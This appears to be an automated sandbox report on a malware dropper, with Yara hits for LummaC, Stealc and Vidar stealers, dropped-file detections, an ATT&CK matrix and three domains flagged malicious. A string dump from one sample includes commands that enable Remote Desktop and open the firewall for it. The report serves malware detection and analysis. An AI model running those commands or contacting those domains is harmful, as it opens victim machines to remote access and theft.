Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Directory queried: C:\Users\user\Documents

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 27.3.new_v8.exe.124cff8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.new_v8.exe.124cff8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000021.00000003.3197330580.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2981305297.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3098957154.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3127124077.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3284579257.000000000165F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2995423907.00000000012F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3148528207.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3126824181.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3178681399.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3134934395.0000000001652000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3313436090.000000000165F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3048486160.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2894968481.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3170492805.0000000001657000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3237340411.0000000001646000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2732256893.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2754649701.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3237340411.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3301700875.000000000165F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2785879104.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3147801023.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3271528231.000000000165F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3091934423.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3262647294.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2895449754.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3266871838.000000000165F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2804806549.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2732759831.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3314956401.000000000165F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2753208386.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2993220330.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.3156872332.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3274426173.000000000165F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3124289253.00000000012F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3124530510.0000000001309000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3261461567.0000000001652000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3137226821.0000000001656000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3026321552.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2954411937.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2999744421.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2780168317.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.2996701233.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3086928884.0000000001652000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2953800369.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2731444217.000000000124A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3137274134.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2930322210.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3161598485.0000000001655000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3052777343.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.3099529730.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.3292216008.000000000165F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2877420998.000000000124E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new_v8.exe PID: 3340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c1a4d3220c.exe PID: 6604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GOLD1234.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shop.exe PID: 3888, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: new_v8.exe PID: 3340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c1a4d3220c.exe PID: 6604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GOLD1234.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shop.exe PID: 3888, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 6.2.stealc_default2.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.stealc_default2.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.2.f6f4816752.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.2360564124.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2360588213.0000000000F2E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3155168475.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3149193410.00000000002F1000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.3036164555.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: f6f4816752.exe PID: 5472, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 6660, type: MEMORYSTR

Contains functionality to start a terminal service

Source: dac4554719.exe, 0000001D.00000002.3154971560.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: dac4554719.exe, 0000001D.00000002.3154971560.0000000002821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9808a67f01d2f0720518035acbde7521c1ec479e5342a25940592acf24703eb27c43933a6df6cc301ccfdb96c295ca9e1379cdKQ6YLeECCI7oRIIlBdu0JXCschRUJvTmfL1bOR7r2ybwLPTtMr==SvPibCQyHPQpdL==JPKpdL==XgagNuVoBJ1TRp==WZYvZSx5AcYV4F==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyPWW XN==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy VSJq29EKfvRj1wrD1Urk1YMDS0GeciN62q==SjKqWZQhIx5IxvMEWthJxwZwAVygSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyakKrZBtxBpL8SEysZYFm1NP=SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy UXdq1wz8Wb5jOALv2o==HSKQRQFVJabxXJtwyK==VButcv==SBYQVv==PXKR9TF3bkB3aZF3 0B3Wj 3WUx3aDB3bTT3XDP3WUN3 EN3 Z23agP=W0yiZx1p1wAZ3Rtg2wVh1yr8W0yiZx1p1wz=WZmmcx1p1wz=XAt=XQt=XQx=XQB=RTumbb==9EGXcykAAm==9EGXcCIaAoa=XU7iXDmpWZQhaEBu UCmcjatJ0uYaRR5NDB+NDF+JYqpdR u1dPmIvhoGt==dx==HkKraSMdNN==aZ7ibBsEB98bgvs=9ZKvbhRxBpLl4vtjPZKXThB50N2cZShq3ALqHOZmdx==SEysZYFm1KU9ivB4OSOyUWMlJSbdiw 92gK=OUOmchA=QZuwcBRD2SwWNtt9Na==PSCCVv==SDurZBAlJSYaiMFg3Ba=PDYgdB5Dxvgc36==OSOEKwNtVB55NMAK4LJS2gbX4I==OjaXZBRrOM8b4ME=RjYvdB5zSZYtaB5EOZYqbXNATZarRBRrOM8b4ME=KAtvMuM6C fVTF==ajx=bZx=OZYrdBRz3s4LjMxcDcrq3Or0cYEl9hHlXjYvbNXpNNU9Tnx 1XLrOyzygU3xHMRjJPPqLNWyBNeAbX15OM8RQJNg2Xrs2Uf0cXbyKcsc 0yqLRNm3wHYNv191QK6xeLhfHHmKssc9TmibhByOJ3 GdPHQX5z3wYlirXL4RriDavheIEw7QE8bDasbd5ANTUcirXq3BziNOUNEh3OBNdqLNWyAI3=JPPKCb==N0CgceWCJjetZr==OZYrdBRz3s4LjMxcDcre2zvscXQl Acl fY1LS 83o4dgSFkARLv1yPu03boVQH=SYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA4VR5k2BLXOPDO0X4pTyEl UqYdBRDIcIk4F==OZYqcCR5ONMF3LXcWTygZBRrOSkgfbpj1QVs2zzye4U5 h5UcUdtMOEECtXTSocWAPY=JUKraRJAOwXkSYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA40L1g3ALhKefk1XbgMU0ETCyMTAt1HKUwYQs=SYaQVzRSMuQmgcNp1WnQOPKwOEIgQWMobjagZSJhFcIqfLJv0RDt1yz5ZG2tVAMlTjahZR5OGq==VAptMyw=PDKjYSRx3vQciwNg1g4wAdbS1YQz8BMQ9TYrPDKjYSRx3vQciwNg1g4wAdfS1YQz8BMQ9TYrSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0BdTgNhFTYphbRl3zPi2fHpd37=SEysZCRo3u89gLQ=KgpuOL==KgpvMb==KgpuNb==KgpvNL==O0KvchRz3uMSfLtbVx==Mgd3akKrZBtxBpLl4MdcJZhdGkGecXpw0MAjNr5dxwZm1KuiGfpjJdx50M4cgSRRxxudyaSg1HYwEu==HfNdRSdu3sL=GfpjJdxDOM78GzNjIv==SDY0ZSFE0wYjgr1c4AK=JTK1ZRJ63womgcxm1Abg4Kvy1X4z AMp9T3rZRMlAK2ggvQ8xa==Gd==aZ7YdBNA3S78QMI8ARGdBs==a0F6cr==ajurZB5yQZK2Yh5m2cT8YvBW1XLXMxvy1XAzUQH=KAptMyw5BJn=KAptMyw5B L=KAptMyw5B P=KAptMyw5BS1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C140C40 sqlite3_bind_zeroblob,	6_2_6C140C40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C140D60 sqlite3_bind_parameter_name,	6_2_6C140D60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C068EA0 sqlite3_clear_bindings,	6_2_6C068EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C140B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	6_2_6C140B40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C066410 bind,WSAGetLastError,	6_2_6C066410
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BFF22D0 sqlite3_bind_blob,	6_2_6BFF22D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C06C030 sqlite3_bind_parameter_count,	6_2_6C06C030
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C06C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	6_2_6C06C050
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C066070 PR_Listen,	6_2_6C066070

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	21 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	12 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	412 Process Injection	111 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	11 Scheduled Task/Job	11 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	23 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	121 Registry Run Keys / Startup Folder	121 Registry Run Keys / Startup Folder	23 Software Packing	NTDS	4510 System Information Discovery	Distributed Component Object Model	11 Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	981 Security Software Discovery	SSH	1 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	461 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Masquerading	DCSync	14 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	461 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	47%	ReversingLabs	Win32.Packed.Themida
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\new_v8[1].exe	100%	Avira	HEUR/AGEN.1313486
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe	100%	Avira	TR/AD.Stealc.cucnc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\GOLD1234[1].exe	100%	Joe Sandbox ML
C:\ProgramData\LgAmARwZ\Application.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\new_v8[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\shop[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RDX123456[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe	100%	Joe Sandbox ML
C:\ProgramData\LgAmARwZ\Application.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	5%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RDX123456[1].exe	75%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\stealc_default2[1].exe	76%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\0b44ippu[1].exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\splwow64[1].exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\GOLD1234[1].exe	62%	ReversingLabs	Win32.Ransomware.RedLine
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\new_v8[1].exe	61%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Offnewhere[1].exe	32%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\shop[1].exe	53%	ReversingLabs	Win32.Packed.Generic
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	76%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	32%	ReversingLabs	Win32.Trojan.CryptBot
C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	61%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	62%	ReversingLabs	Win32.Ransomware.RedLine
C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	75%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	53%	ReversingLabs	Win32.Packed.Generic
C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	42%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1001507001\1bd0484d71.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	47%	ReversingLabs	Win32.Packed.Themida
C:\Users\user\AppData\Local\Temp\CC7V0PUTO3B4JOR1523VPRJQN904A.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\J4EDANXSATRMSXZUEQ.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\POSMOJBFP9W4F4JKM6CCW190HW6F0P.exe	37%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://docs.rs/getrandom#nodejs-es-module-support	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe

Name	Malicious	Reputation
seallysl.site	true	unknown
computeryrati.site	true	unknown
opposezmny.site	true	unknown

